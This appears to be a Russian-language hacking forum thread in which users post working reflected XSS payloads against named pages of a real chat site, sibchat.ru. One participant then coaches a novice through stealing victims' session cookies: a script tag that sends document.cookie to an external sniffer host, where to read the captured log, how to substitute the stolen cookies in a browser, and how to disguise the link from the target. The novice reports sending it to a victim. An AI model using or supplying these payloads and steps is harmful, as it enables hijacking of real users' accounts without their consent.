Посмотрите чат http://sibchat.ru может что-нибудь можно с ним сделать...
Спасибо второй раз.

была уже тема такая!! Дубляж

пассивная XSS:
http://www.sibchat.ru/gallery.php?sid='><script>alert(/Kaban/)</script>

Kaban, молодец. Ксс рабочая, проверял.
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>
Впринципе считаю вопрос исчерпаным. Тему пока что закрывать не буду, может сам ещё найду что нибудь, или другие выложут. Но за оффтоп буду ставить минусы.

А что можно через Xss сделать, и дайте пожалуйста ссылку, где можно подробно об Xss узнать....
Спасибо, что ответили...

Вот это почитай

http://forum.antichat.ru/thread24312-xss.html
http://forum.antichat.ru/thread20140.html

И еще
http://forum.antichat.ru/thread7083-%CD%E5%E1%EE%EB%FC%F8%EE%E9+faq+(XSS).html

http://forum.antichat.ru/thread14424-%CA%E0%EA+%E7%E0%F8%E8%F4%F0%EE%E2%E0%F2%FC+%F1%F1 %FB%EB%EA%F3.html

http://forum.antichat.ru/thread19997-%DD%ED%F6%E8%EA%EB%EE%EF%E5%E4%E8%FF+%F3%FF%E7%E2% E8%EC%FB%F5+%F1%EA%F0%E8%EF%F2%EE%E2.html

И еще по юзай гугл:
XSS - это
Вот так задай гуглу. И лн тебе найдет!

одни только xss
http://www.sibchat.ru/card_help.php?sid=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.sibchat.ru/register.php?sid=%3C/script%3E%3Cscript%3Ealert()%3C/script%3E

Можно отсюда http://forum.chita.ru/
Если версия форума реально 2.06 то топаем сюда http://www.securitylab.ru/vulnerability/203209.php

И ещё..
Показывает comp_id, то есть можно предположить что для бана они используют comp_id.
http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
-------------
Здесь то же самое:
http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
Только ещё вылазиет такая бяка:
&s='+document.regform.sex.value,'iconsel','no','no' ,'no','no'); } function changeicon( icon ) { ic = document.getElementById('user_icon'); if (ic==null) return; ic.src = 'im2/'+icon; document.regform.icon.value=icon; } function open_window(w,h,url,win_id,resizable,toolbar,locn) { sw=screen.width; sh=screen.height; x=(sw-w)/2; y=(sh-h)/2; opts='scrollbars=yes,resizable='+resizable+',toolb ar='+toolbar+',location='+locn+',directories=no,me nubar=no,width='+w+',height='+h; opts+=(navigator.appName.indexOf("Microsoft")>=0?',left='+x+',top='+y:',screenX='+x+',screenY='+ y); win = window.open(url,win_id,opts); win.focus(); return win; }
-------------
ЗЫ Все три ксс добавлю в f.a.q. по чатам

Ответьте пожалуйста на такой вопрос. Куки когда считываются, куда они считываются, где их прочесть, то можно?

в логе сниффера... /log.php (или как там у тебя...)
в QUERY: session_id= pass_hash=

Тоисть это надо писать к примеру http://antichat.ru/cgi-bin/s.jpg?? если да, то между какими строчками этот лог вписывать?

Слушай.. Хватит тупить.. Я тебе в ПМ почти статью написал, как юзать это всё дело. Мне её ещё сюда кинуть что бы ты увидел?

Да не злитесь вы на меня, ну если ламер я, учусь, а как всё сразу понять, я не могу понять, что куда писать и где смотреть куки эти или как, или id, что ламеру обьясние пжалста подробнее.. ;-)

Тоисть это надо писать к примеру http://antichat.ru/cgi-bin/s.jpg?? если да, то между какими строчками этот лог вписывать?

http://antichat.ru/cgi-bin/s.jpg - это сниффер, который ты вставляешь в скрипт...
http://antichat.ru/sniff/log.php - это лог... в котором ты смотришь результаты...

Вот всё что было в ПМ, спрашивай по тексту, что тебе не понятно.
=================================================
Как в ссылке написать адресс?, куда должный отсылаться куки, и где их посмотреть?
http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
Если я правльно тебя понял, то ты про это. Вот одна из тех ксс. В теле тега <script> ты должен прописать путь на сниффер. Если использовать сниффер от античата, то запрос будет таким:
http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
Лог находится здесь: http://antichat.ru/sniff/log.php
В поле QUERY должны высветится разнообразные символы. Это и есть куки. Потом с помощью Оперы или Кукиэдитора делаешь подмену куков, и всё. Можешь так же воспользоватся скриптом от Дрона: http://forum.antichat.ru/threadnav22898-1-10.html
Всё. Дальше уже только нужен твой мозг.

Это получатся мне надо вписать сниффер вместо document.cookie? а жертва должна по ссылке пройти*?

Всё Slip вроде понял, буду юзать, я вот подумал может кто тел. даст я позвоню, проще будет...

Вот насчёт телефона эт вряд ли) Ладно, разбирайся. Будут вопросы, спрашивай.

Ну ладно с тел-ом забыли, вот ещё два вопроса, где взять куиэдитор не могу найти в нете, или как их подменить с помощью оперы?

Хм..... я отправил ссылку со сниффером, он сходил по ней а в логе ни чего нету? что это может быть?

Дык куки надо же послать. А не просто давать ссылку на gif файл :-D

Опа что-то новое такого я не слышал, попрошу пжалста обьяснитья чайнику...

Полное название Cookie Editor. А зачем искать? Если есть на ачате=\
http://antichat.ru/soft/CookieEditorSetup.exe

Обьясинте пожалуйста, как куки то отправить со сниффером?

Дык куки надо же послать. А не просто давать ссылку на gif файл :-D
Прочитай на второй странице мой пост, умник;)
Опа что-то новое такого я не слышал, попрошу пжалста обьяснитья чайнику...
Ничего не надо отправлять. Делай то что я написал на второй странице.

Это получается надо только отправить ссылку на сниффер? юрез по ней зайдёт, и его id в логе?

Не ссылку на снифер. А тот полный запрос, который я привёл. Вместе со <script> и т.д. И дал ссылку на скрипт от Дрона, зашифруешь ссылку, что бы он ничего не просёк. Хватит спрашивать, просто пробуй.

После этого сниффера, что должно произойти?, я отправляю вроде заходят по ссылке, нов логе даже сайт не указан не говоря уже про Query там вообще ни чего нету

Ты отправлял http://antichat.ru/cgi-bin/s.jpg ?
Или http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> ?

http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> и что после этого должно быть? Вот попробуй даже сам.

Slip, ну что там я правильно всё сделал? Я отправлял в поле сообщение вот это http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> кому отправлял он заходил, но в логе ни чего.

Slip??